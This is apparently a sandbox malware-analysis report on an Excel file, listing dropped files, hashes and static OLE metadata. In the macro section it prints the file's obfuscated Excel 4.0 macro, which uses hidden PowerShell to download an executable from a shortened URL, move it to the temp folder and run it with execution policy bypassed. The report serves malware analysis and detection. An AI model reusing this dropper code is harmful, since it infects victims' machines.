                                                                                        SHA-256:F01B6D9921D1A2744419D9283E221C129FAEF7C40CB5EC09BB47D9BE6BC2992C
                                                                                        SHA-512:82003A9023EC05876BE86D273E1975488B2D62F6F0A96B39C9C358B3A98492AF2DECF7F82967C0E5BC60B1A948C88FFB0AD1DCEF49B4C7E932616065ED763196
                                                                                        Malicious:false
                                                                                        Preview: L..................F.... ....;*.....?Ir.....`my..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R....Desktop.d......QK.X&R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....&R.. .6CPRM9~1.XLS..J......&R..&R..*...?.....................6.C.p.r.m.9.7.U.T.l...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\216554\Users.user\Desktop\6Cprm97UTl.xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.6.C.p.r.m.9.7.U.T.l...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216554..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 02:04:39 2021, atime=Wed Jan 6 02:04:39 2021, length=8192, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):867
                                                                                        Entropy (8bit):4.493703650549725
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:85QSxCLgXg/XAlCPCHaX7B8NB/0VngUX+WnicvbWbDtZ3YilMMEpxRljK96TdJP8:85VxU/XTr6NqgUYeeDv3qprNru/
                                                                                        MD5:6998A322A53314E59F4908073525B31A
                                                                                        SHA1:F6A12ABF5E811E73424968267E355D9FE3FBB930
                                                                                        SHA-256:E2F9EF677017D5ED6785546BAFA65854E49111D370873CD60BD34ED2DE4A3496
                                                                                        SHA-512:9348C3E08429E03CAF5FD09B36DC46651958D817A4AA5D94C3602CC60E2A6214200D1302062D64296EF2CE41F98F29D4F2AA8F5863597AEF2C74E003AF21706E
                                                                                        Malicious:false
                                                                                        Preview: L..................F...........7G..?Ir.....?Ir...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R....Desktop.d......QK.X&R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216554\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216554..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):83
                                                                                        Entropy (8bit):4.598856563846179
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:oyBVomMLOxFp2SDxFp2mMLOxFp2v:dj6LOFpDFoLOFI
                                                                                        MD5:E843814B96F07781747EFD43C6082AEC
                                                                                        SHA1:C2F6049FE788D4C8B5492EA8531FB23655E52BB1
                                                                                        SHA-256:7D5160CFBB0EF9CF50C2AA8430F9841E1A6FDCFBA3EAE6D9BD061D0DFEBD1AD5
                                                                                        SHA-512:BD9EC0999C17CCB13FB893D41EE45F7B1325BDDDF3AD8CC23F599889CFD48EAB515B44E71E645C3773562DD6088C0468D0BC85CE81F7BB7050454BEF4218B757
                                                                                        Malicious:false
                                                                                        Preview: Desktop.LNK=0..[xls]..6Cprm97UTl.LNK=0..6Cprm97UTl.LNK=0..[xls]..6Cprm97UTl.LNK=0..
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0BO471L5716CBJPX3UA.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LE6CBUNRM6U6BL3TCXE0.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PXJFD74DLMN8ONH9QYBS.temp
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8016
                                                                                        Entropy (8bit):3.589329078025861
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:chQCsMqaqvsqvJCwoLz8hQCsMqaqvsEHyqvJCworJz1PYXHgf8ImlUVdIu:cyzoLz8ynHnorJz1pf8IDIu
                                                                                        MD5:21EE1956990A0AFF41BE3228CA473491
                                                                                        SHA1:11A3F9FF19BDECB2F40618F1DFDDDD0E3B4F048B
                                                                                        SHA-256:6135B7117C17789ADF7FE18263D645F33F26AD38AE9AA247B058E0B34F1750C7
                                                                                        SHA-512:68B9AEF1DA6E4476C4EBBA78023F56B54402A4836AC8C4E4144F723B5A55A1690DC11B258FB713F27FEDE093FF62B21389F4E82064E4C2512AEDD457ADC3CAA9
                                                                                        Malicious:false
                                                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                        C:\Users\user\Desktop\B5DE0000
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                        Category:dropped
                                                                                        Size (bytes):152144
                                                                                        Entropy (8bit):7.1465330226768335
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:o4k3hbdlylKsgqopeJBWhZFGkE+cL2Ndhi0olgaSN4PZlsuFPOLYiR6nJE0jjavY:Lk3hbdlylKsgqopeJBWhZFVE+W2NdhiZ
                                                                                        MD5:0873A1826881700041830C5B6254A989
                                                                                        SHA1:1B3A26F038342930CF0E86AC6809DE68DCBD057F
                                                                                        SHA-256:4DB366DD1391F89E6B9628CCD197D22B3C943B41B427E6830D13F8F9508FED25
                                                                                        SHA-512:D3FAF4AD765F429398B8FAC893ED79EB4F973C3C796BA658453D54200E5495170FF50D50FD67C30991F42E2E2A996318BFA961C5469C6836ACB7B5D534F306E9
                                                                                        Malicious:false
                                                                                        Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......?...........C.a
                                                                                        C:\Users\user\Documents\12.exe
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):938440
                                                                                        Entropy (8bit):5.522147302514215
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV
                                                                                        MD5:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        SHA1:CB2A4711C5F192EDBDE50229D976FCC95A5A314C
                                                                                        SHA-256:DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191
                                                                                        SHA-512:FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...lt...............................L... ........@.. ....................................`.................................dL..W....`...............:............................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................L......H........'..h$......B...P................................................ .........%.....(......... 4........%.....(.........*...0..........(....t....(....t......................................-.(....t....(....t............+5.....................&.............................-.....(....t....&.1..(....t............(....t....&.......................(....t....................-.........................(....t..........(....t....&. &.(....t....&..&(....t....&.........(....t....&..
                                                                                        C:\Users\user\ntrwe.exe
                                                                                        Process:C:\Users\user\AppData\Local\Temp\12.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):938440
                                                                                        Entropy (8bit):5.522147302514215
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:BFDg0bJ0DxvkrhDdyquS7xY+dQ7itPEodq0sz83nTMh4lT9K850MlZ1odD9ZxRXK:vZbJ1Iqh7x7tM63ghqaOgDX6paVXuV
                                                                                        MD5:1D11ABB9DAC9B15823D1BCAD2B8B3675
                                                                                        SHA1:CB2A4711C5F192EDBDE50229D976FCC95A5A314C
                                                                                        SHA-256:DCC94B0C8FDF6952BD3018D92C1264651D50AAA7911195BB6F9BC6B97618B191
                                                                                        SHA-512:FC8844B5C6FACF10830188DA7BB568D70BB9A3351CBE048E96D752E65DB6650739605B95C57D9335B463FC8B7DE846677CFE390800F5D6AA9202B90A153B4064
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...lt...............................L... ........@.. ....................................`.................................dL..W....`...............:............................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............8..............@..B.................L......H........'..h$......B...P................................................ .........%.....(......... 4........%.....(.........*...0..........(....t....(....t......................................-.(....t....(....t............+5.....................&.............................-.....(....t....&.1..(....t............(....t....&.......................(....t....................-.........................(....t..........(....t....&. &.(....t....&..&(....t....&.........(....t....&..

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Last Saved By: Dell, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Tue Jan 5 14:27:14 2021, Security: 0
                                                                                        Entropy (8bit):7.166667516407053
                                                                                        TrID:
                                                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                        File name:6Cprm97UTl.xls
                                                                                        File size:127488
                                                                                        MD5:29c8b5edc30eadf757b72b0a14857903
                                                                                        SHA1:77d432fb96a0a453bae30107990c2c9ee0314330
                                                                                        SHA256:a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0
                                                                                        SHA512:f3e796ac54c7f64a01aca3ea2ae9c886e11ffdbc103024f34a19fdf4c07a58756375a9b60c4635cfb0790b82339147bf975303cd5f1f1fcbe8e2650d2c85f408
                                                                                        SSDEEP:3072:U4k3hbdlylKsgqopeJBWhZFGkE+cL2Nd+ioo1gaSNAPZlsWFPO7YiR6PJEcjjaPY:Xk3hbdlylKsgqopeJBWhZFVE+W2Nd+id
                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                        File Icon

                                                                                        Icon Hash:e4eea286a4b4bcb4

                                                                                        Static OLE Info

                                                                                        General

                                                                                        Document Type:OLE
                                                                                        Number of OLE Files:1

                                                                                        OLE File "6Cprm97UTl.xls"

                                                                                        Indicators

                                                                                        Has Summary Info:True
                                                                                        Application Name:unknown
                                                                                        Encrypted Document:False
                                                                                        Contains Word Document Stream:False
                                                                                        Contains Workbook/Book Stream:True
                                                                                        Contains PowerPoint Document Stream:False
                                                                                        Contains Visio Document Stream:False
                                                                                        Contains ObjectPool Stream:
                                                                                        Flash Objects Count:
                                                                                        Contains VBA Macros:True

                                                                                        Summary

                                                                                        Code Page:1252
                                                                                        Last Saved By:Dell
                                                                                        Create Time:2020-09-20 21:17:44
                                                                                        Last Saved Time:2021-01-05 14:27:14
                                                                                        Security:0

                                                                                        Document Summary

                                                                                        Document Code Page:1252
                                                                                        Thumbnail Scaling Desired:False
                                                                                        Contains Dirty Links:False
                                                                                        Shared Document:False
                                                                                        Changed Hyperlinks:False
                                                                                        Application Version:983040

                                                                                        Streams

                                                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                        General
                                                                                        Stream Path:\x5DocumentSummaryInformation
                                                                                        File Type:data
                                                                                        Stream Size:4096
                                                                                        Entropy:0.232115956307
                                                                                        Base64 Encoded:False
                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8b 00 00 00 02 00 00 00 e4 04 00 00
                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                        General
                                                                                        Stream Path:\x5SummaryInformation
                                                                                        File Type:data
                                                                                        Stream Size:4096
                                                                                        Entropy:0.190042678721
                                                                                        Base64 Encoded:False
                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . h . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . . . . . . . . . . . . . D e l l . . . . @ . . . . L . z . . . . @ . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 48 00 00 00 0d 00 00 00 54 00 00 00 13 00 00 00 60 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00 40 00 00 00 00 4c f7 7a
                                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 116784
                                                                                        General
                                                                                        Stream Path:Workbook
                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                        Stream Size:116784
                                                                                        Entropy:7.53092053212
                                                                                        Base64 Encoded:True
                                                                                        Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                                        Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                        Macro 4.0 Code

                                                                                        =ERROR(FALSE),,,,,,,,,"=GET.CELL(5,M583)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Do""&CHAR(119)&""n'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/qjdJoz4','12""&CHAR(46)&""exe')"")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item """"12""&CHAR(46)&""exe"""" -Destination """"${enV`:temp}"""""")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12""&CHAR(46)&""exe')"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,